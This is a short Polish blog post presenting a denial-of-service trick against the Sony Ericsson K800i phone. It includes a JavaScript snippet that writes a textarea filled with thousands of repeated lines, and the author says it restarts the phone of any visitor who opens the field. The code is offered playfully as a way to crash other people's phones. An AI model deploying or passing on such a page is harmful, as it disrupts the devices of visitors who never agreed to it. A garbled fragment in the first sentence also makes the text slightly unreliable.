SE k800i DoS

Istnieje możliwość zawieszenia telefonu marki Sony Ericsson k800i (u mnie przynajmniej działa)document.wi
Robimy stronę w HTMLu i wpisujemy w nią


script
document.writeln("textarea");
for(w=0;w<5000;w++){
document.writeln("ABCDEFGHIJKLMNOPQRSTUVWXYZ");
}
document.writeln("textarea")
script

(dałem samo textarea i script bo wordpress.com ucina tagi każdy chyba wie że trzeba to otworzyć i zamknąć ;))
Kiedy nasz widz po długim ładowaniu pole tekstowe i za pomocą naciśnięcia klawisza konsoli będzie chciał je otworzyć zrestartuje mu się telefon 😉 (zgadnij dlaczego :P)
Chciałbym polecić blog mojego kolegi ponieważ zauważyłem że on mnie promuje to i ja go popromuje też 😉

Skomentuj

